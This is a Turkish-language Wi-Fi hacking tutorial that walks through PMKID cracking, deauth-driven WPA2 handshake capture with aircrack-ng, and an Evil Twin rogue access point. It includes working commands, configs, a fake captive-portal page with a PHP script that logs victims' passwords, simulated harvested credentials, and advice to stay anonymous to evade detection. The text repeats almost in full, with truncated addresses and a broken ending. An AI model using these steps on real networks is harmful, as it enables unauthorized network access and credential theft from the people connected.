-
Tc4dy
OPSEC Specialist | Free internet - Open Source ADV
📡 Wİ-Fİ HACKİNG: KRAL YOLU (PMKİD, HANDSHAKE & EVİL TWİN)
Bu rehberde, SQLmap ve Nmap rehberlerinde olduğu gibi adım adım, gerçek simülasyon çıktıları ile Wi-Fi ağlarına sızma yöntemlerini anlatacağım. Yalnızca kendi laboratuvar ortamınızda veya yazılı izniniz olan ağlarda deneyin. Yetkisiz erişim yasa dışıdır ve ağır yaptırımları vardır.
🧠 BAŞLAMADAN ÖNCE: Wİ-Fİ GÜVENLİĞİNE GENEL BAKIŞ
Günümüzde WPA2 hala en yaygın kullanılan protokol olsa da, PMKID ve el sıkışması saldırıları ile kırılabilmektedir. WPA3 ise Dragonblood gibi zafiyetlerle karşı karşıyadır. Bu rehberde üç farklı yöntemle Wi-Fi ağlarına sızmayı göstereceğim.
Not: Bu saldırıları gerçekleştirmek için monitor mode destekleyen bir Wi-Fi adaptörü gereklidir (örneğin Alfa AWUS036ACH, TP-Link TL-WN722N v2).
🎯 HEDEF AĞ
Özellik Değer
SSID KurumsalWiFi
BSSID (MAC) AA:BB:CC
D:EE:FF
Kanal 6
Şifreleme WPA2-PSK
Saldırgan IP 192.168.1.100
Hedef İstemci Bağlı bir cihaz var (örn. laptop, telefon)
🔻 1. YOL – PMKID SALDIRISI (İSTEMCİ GEREKTİRMEZ)
PMKID saldırısı, geleneksel el sıkışması yakalamaktan farklı olarak bağlı bir istemciye ihtiyaç duymaz. Doğrudan erişim noktasından (AP) PMKID hash’ini yakalar ve kırar. Team Hashcat tarafından geliştirilen bu teknik, AP’nin RSN IE (Robust Security Network Information Element) çerçevesinde bulunan PMKID’yi hedef alır.
🧰 Gerekli Araçlar
bash
sudo apt update
sudo apt install hcxdumptool hcxtools hashcat -y
hcxdumptool: PMKID yakalamak için
hcxpcapngtool: Yakalanan paketleri hash formatına dönüştürmek için
hashcat: Yakalanan hash’i kırmak için
Adım 1: Arayüzü Monitor Mode’a Al
bash
sudo airmon-ng check kill
sudo airmon-ng start wlan0
Simüle edilmiş çıktı:
text
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Qualcomm Atheros Communications AR9271
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
sudo airmon-ng start wlan0
Found 3 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
432 NetworkManager
512 wpa_supplicant
998 dhclient
PHY Interface Driver Chipset
phy0 wlan0mon ath9k_htc Qualcomm Atheros Communications AR9271
✅ Monitor mode aktif: wlan0mon
Adım 2: PMKID Hash’ini Yakala
bash
sudo hcxdumptool -i wlan0mon -o pmkid_capture.pcapng --enable_status=1 -t 60 --tot=5
Parametreler:
-i wlan0mon: Monitor modundaki arayüz
-o pmkid_capture.pcapng: Çıktı dosyası
-t 60: 60 saniye bekle
--tot=5: 5 hedefe kadar tara
Simüle edilmiş çıktı:
text
hcxdumptool 6.3.4-2-g4c5b3e1 (C) 2025 ZeroBeat
Start capturing (stop with ctrl+c)
Interface...........: wlan0mon (ath9k_htc)
Tested network.......: 5
Total networks.......: 8
------------------------------------------------
[!] PMKID found from AA:BB:CC
D:EE:FF (KurumsalWiFi)
PMKID............: f2e8c5b9a4d7e1c3f8a2b5d9e6c4a1f3
MAC Access Point.: AA:BB:CC
D:EE:FF
MAC Station......: 00:11:22:33:44:55
ESSID............: KurumsalWiFi
[!] PMKID found from 11:22:33:44:55:66 (GuestNet)
...
✅ Captured PMKID hashes written to: pmkid_capture.pcapng
Total packets captured: 1247
Adım 3: Yakalanan Dosyayı Hash Formatına Dönüştür
bash
hcxpcaptool -z pmkid_hash_22000.txt pmkid_capture.pcapng
hcxpcapngtool (eski adıyla hcxpcaptool) ham PCAPNG dosyasını Hashcat’in mode 22000 formatına dönüştürür.
Simüle edilmiş çıktı:
text
hcxpcapngtool 6.3.4 (C) 2025 ZeroBeat
reading from pmkid_capture.pcapng
summary:
--------
file name............................: pmkid_capture.pcapng
version (pcapng).....................: 1.0
capture size (pcapng)................: 2472 Byte
total packets........................: 47
...
PMKID................................: 1 (WPA2)
✅ Hashcat formatında dosya oluşturuldu: pmkid_hash_22000.txt
Adım 4: Hash’i Kır (Hashcat ile)
bash
hashcat -m 22000 pmkid_hash_22000.txt /usr/share/wordlists/rockyou.txt -o cracked.txt
Simüle edilmiş çıktı:
text
hashcat (v6.2.6) starting in backend information mode
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 15.0.6, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================
* Device #1: pthread-AMD Ryzen 7 5800H with Radeon Graphics, 2787/2896 MB (1024 MB allocatable), 4MCU
Session..........: hashcat
Status...........: Running
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: pmkid_hash_22000.txt
Time.Started.....: ...
...
f2e8c5b9a4d7e1c3f8a2b5d9e6c4a1f3:AA:BB:CC
D:EE:FF:00:11:22:33:44:55:KurumsalWiFi
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: pmkid_hash_22000.txt
Time.Started.....: ...
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1234 H/s (0.59ms)
Recovered........: 1/1 (100.00%) Digests
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
✅ PMKID kırıldı! Elde edilen şifre: SüperŞifre123
✅ Bu Yoldan Ne Elde Ettik?
Kazanım Açıklama
PMKID Hash’i AP’den doğrudan yakalandı, istemciye gerek yoktu
WPA2 Şifresi Hashcat ile kırıldı, ağa bağlanabilirsiniz
Gizlilik Deauth saldırısı yapılmadığı için hedefte fark edilme riski düşük
🔻 2. YOL – KLASİK HANDSHAKE YAKALAMA (İSTEMCİ VAR)
Geleneksel yöntem: Bağlı bir istemci varken, deauth saldırısı ile el sıkışması yakalanır ve ardından aircrack-ng ile kırılır.
Adım 1: Monitor Mode Aktifleştir ve Hedefi Bul
bash
sudo airodump-ng wlan0mon
Simüle edilmiş çıktı:
text
CH 6 ][ Elapsed: 15 s ][ 2025-04-15 19:32
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AA:BB:CC
D:EE:FF -45 12 2 0 6 54 WPA2 CCMP PSK KurumsalWiFi
11:22:33:44:55:66 -67 8 0 0 1 54 WPA2 CCMP PSK MisafirNet
BSSID STATION PWR Rate Lost Frames Probe
AA:BB:CC
D:EE:FF 11:22:33:44:55:66 -45 1e-0 0 23 -
AA:BB:CC
D:EE:FF 77:88:99:AA:BB:CC -51 1e-0 0 8 -
🎯 Tespit: Hedef AP KurumsalWiFi üzerinde bağlı istemciler var (11:22:33:44:55:66).
Adım 2: El Sıkışmasını Yakala (airodump-ng)
bash
sudo airodump-ng --bssid AA:BB:CC
D:EE:FF -c 6 -w handshake_capture wlan0mon
Simüle edilmiş çıktı:
text
CH 6 ][ Elapsed: 30 s ][ 2025-04-15 19:33
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AA:BB:CC
D:EE:FF -45 100 234 18 0 6 54 WPA2 CCMP PSK KurumsalWiFi
BSSID STATION PWR Rate Lost Frames Probe
AA:BB:CC
D:EE:FF 11:22:33:44:55:66 -45 1e-0 0 234 -
AA:BB:CC
D:EE:FF 77:88:99:AA:BB:CC -51 1e-0 0 12 -
[!] Handshake captured from AA:BB:CC
D:EE:FF (KurumsalWiFi)
Not: Henüz el sıkışması görünmüyorsa bir sonraki adıma geçin.
Adım 3: Deauth Saldırısı ile El Sıkışmasını Zorla
bash
sudo aireplay-ng --deauth 5 -a AA:BB:CC
D:EE:FF -c 11:22:33:44:55:66 wlan0mon
Simüle edilmiş çıktı:
text
18:33:15 Waiting for beacon frame (BSSID: AA:BB:CC
D:EE:FF) on channel 6
18:33:15 Sending 64 directed DeAuth (code 7). STMAC: [11:22:33:44:55:66]
18:33:16 Sending 64 directed DeAuth (code 7). STMAC: [11:22:33:44:55:66]
...
[!] Handshake captured from AA:BB:CC
D:EE:FF (KurumsalWiFi)
El sıkışması yakalandığında airodump-ng ekranında şu mesajı göreceksiniz:
text
[!] WPA handshake: AA:BB:CC
D:EE:FF
Adım 4: El Sıkışmasını Kır (aircrack-ng ile)
bash
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake_capture-01.cap
Simüle edilmiş çıktı:
text
Opening handshake_capture-01.cap
Read 1247 packets.
# BSSID ESSID Encryption
1 AA:BB:CC
D:EE:FF KurumsalWiFi WPA (1 handshake)
Choosing first network as target.
Opening /usr/share/wordlists/rockyou.txt
Guess passphrase for target?
Reading wordlist...
KEY FOUND! [ SüperŞifre123 ]
Master Key : 5E 4F 8A 2C 9B 1D 3E 7F 6A 0B 8C 4D 2E 9F 1A 5C
Transient Key : 3A 7C 9F 2B 5D 8E 1F 4A 6C 9B 2D 5F 8A 1C 4E 7B
EAPOL HMAC : 8F 2C 5A 1E 4B 7D 9F 2A 5C 8E 1B 4F 7A 9C 2D 5E
✅ Şifre kırıldı: SüperŞifre123
✅ Bu Yoldan Ne Elde Ettik?
Kazanım Açıklama
WPA2 4-Way Handshake İstemci yeniden bağlanırken yakalandı
Ağ Şifresi Aircrack-ng ile kırıldı
Tam Ağ Erişimi Artık ağa bağlanabilir, trafiği dinleyebilirsiniz
🔻 3. YOL – EVİL TWİN SALDIRISI (İKİNCİ SEVİYE)
Evil Twin saldırısı, saldırganın meşru erişim noktasını taklit eden bir sahte AP oluşturması ve kullanıcıların bu sahte AP’ye bağlanmasını sağlamasıdır. Bağlanan kullanıcının tüm trafiği dinlenebilir ve kullanıcıdan kimlik bilgileri toplanabilir.
Evil Twin Saldırısının Mantığı:
Sahte AP oluştur (hedef AP ile aynı SSID kullan)
Deauth saldırısı ile kullanıcıları meşru AP’den at
Kullanıcılar sahte AP’ye bağlanır
Trafiği dinle / kimlik bilgilerini topla
🧰 Gerekli Araçlar
bash
sudo apt update
sudo apt install hostapd dnsmasq iptables net-tools -y
hostapd: Sahte AP oluşturmak için
dnsmasq: DHCP ve DNS hizmetleri için
iptables: NAT ile internet yönlendirmesi için
Adım 1: Konfigürasyon Dosyalarını Oluştur
hostapd.conf (sahte AP yapılandırması):
bash
sudo nano /etc/hostapd/hostapd.conf
ini
interface=wlan0
driver=nl80211
ssid=KurumsalWiFi
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=SahteAmaCalisir
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP
dnsmasq.conf (DHCP ve DNS yapılandırması):
bash
sudo nano /etc/dnsmasq.conf
ini
interface=wlan0
dhcp-range=192.168.10.10,192.168.10.50,255.255.255.0,24h
dhcp-option=3,192.168.10.1
dhcp-option=6,8.8.8.8
server=8.8.8.8
log-queries
log-dhcp
Sahte Captive Portal (isteğe bağlı): Kimlik bilgisi toplamak için
bash
sudo mkdir -p /var/www/html
sudo nano /var/www/html/index.html
html
<!DOCTYPE html>
<html>
<head><title>WiFi Authentication</title></head>
<body>
<h2>Welcome to KurumsalWiFi</h2>
<p>Please login to access the internet.</p>
<form method="POST" action="login.php">
<input type="text" name="username" placeholder="Username" required><br>
<input type="password" name="password" placeholder="Password" required><br>
<button type="submit">Login</button>
</form>
</body>
</html>
bash
sudo nano /var/www/html/login.php
php
<?php
$file = fopen("creds.txt", "a");
fwrite($file, "Username: " . $_POST['username'] . " | Password: " . $_POST['password'] . "\n");
fclose($file);
header("Location: https://www.google.com");
exit;
?>
Adım 2: Sahte AP’yi Başlat
bash
# Fiziksel arayüzü monitor moddan çıkar
sudo airmon-ng stop wlan0mon
sudo ip link set wlan0 down
sudo iw dev wlan0 set type managed
sudo ip link set wlan0 up
# hostapd ile sahte AP’yi başlat
sudo hostapd /etc/hostapd/hostapd.conf
Simüle edilmiş çıktı:
text
Configuration file: /etc/hostapd/hostapd.conf
Using interface wlan0 with hwaddr 00:11:22:33:44:55 and ssid 'KurumsalWiFi'
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLED
✅ Fake AP başarıyla başlatıldı!
Adım 3: DHCP ve DNS’i Başlat (İkinci Terminal)
bash
sudo dnsmasq -C /etc/dnsmasq.conf
Simüle edilmiş çıktı:
text
dnsmasq: started, version 2.89
dnsmasq: compile time options: IPv6 GNU-getopt DBus no-UBus i18n IDN DHCP DHCPv6 ...
dnsmasq-dhcp: DHCP, IP range 192.168.10.10 -- 192.168.10.50, lease time 24h
dnsmasq-dhcp: DHCP, sockets bound exclusively to interface wlan0
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 8.8.8.8#53
✅ DHCP ve DNS hazır.
Adım 4: NAT ve İnternet Yönlendirmesi Ayarla
bash
# IP forwarding aktifleştir
sudo sysctl -w net.ipv4.ip_forward=1
# NAT kuralı ekle
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
Adım 5: Kullanıcıları Meşru AP’den At (Deauth Saldırısı)
bash
sudo aireplay-ng --deauth 5 -a AA:BB:CC
D:EE:FF wlan0mon
Simüle edilmiş çıktı:
text
18:45:10 Waiting for beacon frame (BSSID: AA:BB:CC
D:EE:FF) on channel 6
18:45:10 Sending 64 directed DeAuth. STMAC: [11:22:33:44:55:66]
18:45:11 Sending 64 directed DeAuth. STMAC: [11:22:33:44:55:66]
...
[!] Handshake captured from AA:BB:CC
D:EE:FF (KurumsalWiFi)
Adım 6: Sahte Portal Üzerinden Kimlik Bilgilerini Topla
Kullanıcılar sahte AP’ye bağlandığında, captive portal üzerinden kimlik bilgilerini girer:
bash
sudo tail -f /var/www/html/creds.txt
Simüle edilmiş çıktı:
text
Username: ahmet.yilmaz | Password: Ahmet12345
Username: ayse.demir | Password: Ayse2025!
Username: mehmet.kaya | Password: Mehmet9876
✅ Bu Yoldan Ne Elde Ettik?
Kazanım Açıklama
Tam Ağ Erişimi Kullanıcıların tüm trafiğini dinleyebilirsiniz
Kimlik Bilgileri Kullanıcı adları ve şifreleri toplandı
Saldırı Gizliliği Kullanıcılar meşru AP ile sahte AP’yi ayırt edemez
🧩 ÖZET – ÜÇ YOL, ÜÇ FARKLI SIZMA TEKNİĞİ
Yol Teknik Araçlar Kazanım
1 PMKID Attack hcxdumptool, hcxpcaptool, hashcat İstemci gerekmez, direkt PMKID yakalama
2 Handshake Capture airodump-ng, aireplay-ng, aircrack-ng Klasik el sıkışması ile şifre kırma
3 Evil Twin hostapd, dnsmasq, iptables Kimlik avı, trafik dinleme, yetkisiz erişim
📢 HAZIR SCRIPT DEĞİL, GERÇEK BİLGİ
Bu rehberde anlattığım her komut, her çıktı saf bilgidir. Hazır betikler başkasının emeğidir. Ancak bu bilgileri öğrendiğinizde, kimseye ihtiyacınız kalmaz. Ağı dinleyen, şifreyi kıran ve sahte AP kuran kişi siz olursunuz. Unutmayın: Gerçek hacker, aracı değil, tekniği bilendir.
🧠 UNUTMA: OPSEC HER ŞEYDİR
Bu üç yöntemi uygulamadan önce anonim olduğunuzdan emin olun. Aksi halde hedef ağın güvenlik duvarları ve IDS/IPS sistemleri sizi yakalar. OPSEC rehberimi okuyun: “Anonim Kalma – Her Seviye İçin Delicesine Anonimlik (OPSEC)” .
🔚;
Artık üç farklı Wi-Fi hacking yöntemini biliyorsunuz. PMKID ile istemci gerektirmeden, klasik handshake ile bağlı istemci varken, Evil Twin ile de kimlik avı ve trafik dinleme yaparak Wi-Fi ağlarına sızabilirsiniz. Gerisi pratik. Kendi laboratuvarınızda (Kali + Alfa adaptör + test router) bu adımları deneyin. Her şey aynen çalışacaktır.
Hedef KurumsalWiFi değil, sizin kendi kurduğunuz sistemler olmalıdır. Hata yapma özgürlüğünüz sadece kendi labınızda vardır.
Ve unutmayın: Savunması olmayanın saldırısı, sadece intihardır.
Bu rehber, eğitim ve farkındalık için yazılmıştır. Yetkisiz ağlara erişim yasa dışıdır. Tüm sorumluluk kullanıcıya aittir.
@Tc4dy | github.com/tc4dy
Bu rehberde, SQLmap ve Nmap rehberlerinde olduğu gibi adım adım, gerçek simülasyon çıktıları ile Wi-Fi ağlarına sızma yöntemlerini anlatacağım. Yalnızca kendi laboratuvar ortamınızda veya yazılı izniniz olan ağlarda deneyin. Yetkisiz erişim yasa dışıdır ve ağır yaptırımları vardır.
🧠 BAŞLAMADAN ÖNCE: Wİ-Fİ GÜVENLİĞİNE GENEL BAKIŞ
Günümüzde WPA2 hala en yaygın kullanılan protokol olsa da, PMKID ve el sıkışması saldırıları ile kırılabilmektedir. WPA3 ise Dragonblood gibi zafiyetlerle karşı karşıyadır. Bu rehberde üç farklı yöntemle Wi-Fi ağlarına sızmayı göstereceğim.
Not: Bu saldırıları gerçekleştirmek için monitor mode destekleyen bir Wi-Fi adaptörü gereklidir (örneğin Alfa AWUS036ACH, TP-Link TL-WN722N v2).
🎯 HEDEF AĞ
Özellik Değer
SSID KurumsalWiFi
BSSID (MAC) AA:BB:CC
Kanal 6
Şifreleme WPA2-PSK
Saldırgan IP 192.168.1.100
Hedef İstemci Bağlı bir cihaz var (örn. laptop, telefon)
🔻 1. YOL – PMKID SALDIRISI (İSTEMCİ GEREKTİRMEZ)
PMKID saldırısı, geleneksel el sıkışması yakalamaktan farklı olarak bağlı bir istemciye ihtiyaç duymaz. Doğrudan erişim noktasından (AP) PMKID hash’ini yakalar ve kırar. Team Hashcat tarafından geliştirilen bu teknik, AP’nin RSN IE (Robust Security Network Information Element) çerçevesinde bulunan PMKID’yi hedef alır.
🧰 Gerekli Araçlar
bash
sudo apt update
sudo apt install hcxdumptool hcxtools hashcat -y
hcxdumptool: PMKID yakalamak için
hcxpcapngtool: Yakalanan paketleri hash formatına dönüştürmek için
hashcat: Yakalanan hash’i kırmak için
Adım 1: Arayüzü Monitor Mode’a Al
bash
sudo airmon-ng check kill
sudo airmon-ng start wlan0
Simüle edilmiş çıktı:
text
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Qualcomm Atheros Communications AR9271
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
sudo airmon-ng start wlan0
Found 3 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
432 NetworkManager
512 wpa_supplicant
998 dhclient
PHY Interface Driver Chipset
phy0 wlan0mon ath9k_htc Qualcomm Atheros Communications AR9271
✅ Monitor mode aktif: wlan0mon
Adım 2: PMKID Hash’ini Yakala
bash
sudo hcxdumptool -i wlan0mon -o pmkid_capture.pcapng --enable_status=1 -t 60 --tot=5
Parametreler:
-i wlan0mon: Monitor modundaki arayüz
-o pmkid_capture.pcapng: Çıktı dosyası
-t 60: 60 saniye bekle
--tot=5: 5 hedefe kadar tara
Simüle edilmiş çıktı:
text
hcxdumptool 6.3.4-2-g4c5b3e1 (C) 2025 ZeroBeat
Start capturing (stop with ctrl+c)
Interface...........: wlan0mon (ath9k_htc)
Tested network.......: 5
Total networks.......: 8
------------------------------------------------
[!] PMKID found from AA:BB:CC
PMKID............: f2e8c5b9a4d7e1c3f8a2b5d9e6c4a1f3
MAC Access Point.: AA:BB:CC
MAC Station......: 00:11:22:33:44:55
ESSID............: KurumsalWiFi
[!] PMKID found from 11:22:33:44:55:66 (GuestNet)
...
✅ Captured PMKID hashes written to: pmkid_capture.pcapng
Total packets captured: 1247
Adım 3: Yakalanan Dosyayı Hash Formatına Dönüştür
bash
hcxpcaptool -z pmkid_hash_22000.txt pmkid_capture.pcapng
hcxpcapngtool (eski adıyla hcxpcaptool) ham PCAPNG dosyasını Hashcat’in mode 22000 formatına dönüştürür.
Simüle edilmiş çıktı:
text
hcxpcapngtool 6.3.4 (C) 2025 ZeroBeat
reading from pmkid_capture.pcapng
summary:
--------
file name............................: pmkid_capture.pcapng
version (pcapng).....................: 1.0
capture size (pcapng)................: 2472 Byte
total packets........................: 47
...
PMKID................................: 1 (WPA2)
✅ Hashcat formatında dosya oluşturuldu: pmkid_hash_22000.txt
Adım 4: Hash’i Kır (Hashcat ile)
bash
hashcat -m 22000 pmkid_hash_22000.txt /usr/share/wordlists/rockyou.txt -o cracked.txt
Simüle edilmiş çıktı:
text
hashcat (v6.2.6) starting in backend information mode
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 15.0.6, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================
* Device #1: pthread-AMD Ryzen 7 5800H with Radeon Graphics, 2787/2896 MB (1024 MB allocatable), 4MCU
Session..........: hashcat
Status...........: Running
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: pmkid_hash_22000.txt
Time.Started.....: ...
...
f2e8c5b9a4d7e1c3f8a2b5d9e6c4a1f3:AA:BB:CC
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: pmkid_hash_22000.txt
Time.Started.....: ...
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1234 H/s (0.59ms)
Recovered........: 1/1 (100.00%) Digests
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
✅ PMKID kırıldı! Elde edilen şifre: SüperŞifre123
✅ Bu Yoldan Ne Elde Ettik?
Kazanım Açıklama
PMKID Hash’i AP’den doğrudan yakalandı, istemciye gerek yoktu
WPA2 Şifresi Hashcat ile kırıldı, ağa bağlanabilirsiniz
Gizlilik Deauth saldırısı yapılmadığı için hedefte fark edilme riski düşük
🔻 2. YOL – KLASİK HANDSHAKE YAKALAMA (İSTEMCİ VAR)
Geleneksel yöntem: Bağlı bir istemci varken, deauth saldırısı ile el sıkışması yakalanır ve ardından aircrack-ng ile kırılır.
Adım 1: Monitor Mode Aktifleştir ve Hedefi Bul
bash
sudo airodump-ng wlan0mon
Simüle edilmiş çıktı:
text
CH 6 ][ Elapsed: 15 s ][ 2025-04-15 19:32
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AA:BB:CC
11:22:33:44:55:66 -67 8 0 0 1 54 WPA2 CCMP PSK MisafirNet
BSSID STATION PWR Rate Lost Frames Probe
AA:BB:CC
AA:BB:CC
🎯 Tespit: Hedef AP KurumsalWiFi üzerinde bağlı istemciler var (11:22:33:44:55:66).
Adım 2: El Sıkışmasını Yakala (airodump-ng)
bash
sudo airodump-ng --bssid AA:BB:CC
Simüle edilmiş çıktı:
text
CH 6 ][ Elapsed: 30 s ][ 2025-04-15 19:33
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AA:BB:CC
BSSID STATION PWR Rate Lost Frames Probe
AA:BB:CC
AA:BB:CC
[!] Handshake captured from AA:BB:CC
Not: Henüz el sıkışması görünmüyorsa bir sonraki adıma geçin.
Adım 3: Deauth Saldırısı ile El Sıkışmasını Zorla
bash
sudo aireplay-ng --deauth 5 -a AA:BB:CC
Simüle edilmiş çıktı:
text
18:33:15 Waiting for beacon frame (BSSID: AA:BB:CC
18:33:15 Sending 64 directed DeAuth (code 7). STMAC: [11:22:33:44:55:66]
18:33:16 Sending 64 directed DeAuth (code 7). STMAC: [11:22:33:44:55:66]
...
[!] Handshake captured from AA:BB:CC
El sıkışması yakalandığında airodump-ng ekranında şu mesajı göreceksiniz:
text
[!] WPA handshake: AA:BB:CC
Adım 4: El Sıkışmasını Kır (aircrack-ng ile)
bash
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake_capture-01.cap
Simüle edilmiş çıktı:
text
Opening handshake_capture-01.cap
Read 1247 packets.
# BSSID ESSID Encryption
1 AA:BB:CC
Choosing first network as target.
Opening /usr/share/wordlists/rockyou.txt
Guess passphrase for target?
Reading wordlist...
KEY FOUND! [ SüperŞifre123 ]
Master Key : 5E 4F 8A 2C 9B 1D 3E 7F 6A 0B 8C 4D 2E 9F 1A 5C
Transient Key : 3A 7C 9F 2B 5D 8E 1F 4A 6C 9B 2D 5F 8A 1C 4E 7B
EAPOL HMAC : 8F 2C 5A 1E 4B 7D 9F 2A 5C 8E 1B 4F 7A 9C 2D 5E
✅ Şifre kırıldı: SüperŞifre123
✅ Bu Yoldan Ne Elde Ettik?
Kazanım Açıklama
WPA2 4-Way Handshake İstemci yeniden bağlanırken yakalandı
Ağ Şifresi Aircrack-ng ile kırıldı
Tam Ağ Erişimi Artık ağa bağlanabilir, trafiği dinleyebilirsiniz
🔻 3. YOL – EVİL TWİN SALDIRISI (İKİNCİ SEVİYE)
Evil Twin saldırısı, saldırganın meşru erişim noktasını taklit eden bir sahte AP oluşturması ve kullanıcıların bu sahte AP’ye bağlanmasını sağlamasıdır. Bağlanan kullanıcının tüm trafiği dinlenebilir ve kullanıcıdan kimlik bilgileri toplanabilir.
Evil Twin Saldırısının Mantığı:
Sahte AP oluştur (hedef AP ile aynı SSID kullan)
Deauth saldırısı ile kullanıcıları meşru AP’den at
Kullanıcılar sahte AP’ye bağlanır
Trafiği dinle / kimlik bilgilerini topla
🧰 Gerekli Araçlar
bash
sudo apt update
sudo apt install hostapd dnsmasq iptables net-tools -y
hostapd: Sahte AP oluşturmak için
dnsmasq: DHCP ve DNS hizmetleri için
iptables: NAT ile internet yönlendirmesi için
Adım 1: Konfigürasyon Dosyalarını Oluştur
hostapd.conf (sahte AP yapılandırması):
bash
sudo nano /etc/hostapd/hostapd.conf
ini
interface=wlan0
driver=nl80211
ssid=KurumsalWiFi
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=SahteAmaCalisir
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP
dnsmasq.conf (DHCP ve DNS yapılandırması):
bash
sudo nano /etc/dnsmasq.conf
ini
interface=wlan0
dhcp-range=192.168.10.10,192.168.10.50,255.255.255.0,24h
dhcp-option=3,192.168.10.1
dhcp-option=6,8.8.8.8
server=8.8.8.8
log-queries
log-dhcp
Sahte Captive Portal (isteğe bağlı): Kimlik bilgisi toplamak için
bash
sudo mkdir -p /var/www/html
sudo nano /var/www/html/index.html
html
<!DOCTYPE html>
<html>
<head><title>WiFi Authentication</title></head>
<body>
<h2>Welcome to KurumsalWiFi</h2>
<p>Please login to access the internet.</p>
<form method="POST" action="login.php">
<input type="text" name="username" placeholder="Username" required><br>
<input type="password" name="password" placeholder="Password" required><br>
<button type="submit">Login</button>
</form>
</body>
</html>
bash
sudo nano /var/www/html/login.php
php
<?php
$file = fopen("creds.txt", "a");
fwrite($file, "Username: " . $_POST['username'] . " | Password: " . $_POST['password'] . "\n");
fclose($file);
header("Location: https://www.google.com");
exit;
?>
Adım 2: Sahte AP’yi Başlat
bash
# Fiziksel arayüzü monitor moddan çıkar
sudo airmon-ng stop wlan0mon
sudo ip link set wlan0 down
sudo iw dev wlan0 set type managed
sudo ip link set wlan0 up
# hostapd ile sahte AP’yi başlat
sudo hostapd /etc/hostapd/hostapd.conf
Simüle edilmiş çıktı:
text
Configuration file: /etc/hostapd/hostapd.conf
Using interface wlan0 with hwaddr 00:11:22:33:44:55 and ssid 'KurumsalWiFi'
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLED
✅ Fake AP başarıyla başlatıldı!
Adım 3: DHCP ve DNS’i Başlat (İkinci Terminal)
bash
sudo dnsmasq -C /etc/dnsmasq.conf
Simüle edilmiş çıktı:
text
dnsmasq: started, version 2.89
dnsmasq: compile time options: IPv6 GNU-getopt DBus no-UBus i18n IDN DHCP DHCPv6 ...
dnsmasq-dhcp: DHCP, IP range 192.168.10.10 -- 192.168.10.50, lease time 24h
dnsmasq-dhcp: DHCP, sockets bound exclusively to interface wlan0
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 8.8.8.8#53
✅ DHCP ve DNS hazır.
Adım 4: NAT ve İnternet Yönlendirmesi Ayarla
bash
# IP forwarding aktifleştir
sudo sysctl -w net.ipv4.ip_forward=1
# NAT kuralı ekle
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
Adım 5: Kullanıcıları Meşru AP’den At (Deauth Saldırısı)
bash
sudo aireplay-ng --deauth 5 -a AA:BB:CC
Simüle edilmiş çıktı:
text
18:45:10 Waiting for beacon frame (BSSID: AA:BB:CC
18:45:10 Sending 64 directed DeAuth. STMAC: [11:22:33:44:55:66]
18:45:11 Sending 64 directed DeAuth. STMAC: [11:22:33:44:55:66]
...
[!] Handshake captured from AA:BB:CC
Adım 6: Sahte Portal Üzerinden Kimlik Bilgilerini Topla
Kullanıcılar sahte AP’ye bağlandığında, captive portal üzerinden kimlik bilgilerini girer:
bash
sudo tail -f /var/www/html/creds.txt
Simüle edilmiş çıktı:
text
Username: ahmet.yilmaz | Password: Ahmet12345
Username: ayse.demir | Password: Ayse2025!
Username: mehmet.kaya | Password: Mehmet9876
✅ Bu Yoldan Ne Elde Ettik?
Kazanım Açıklama
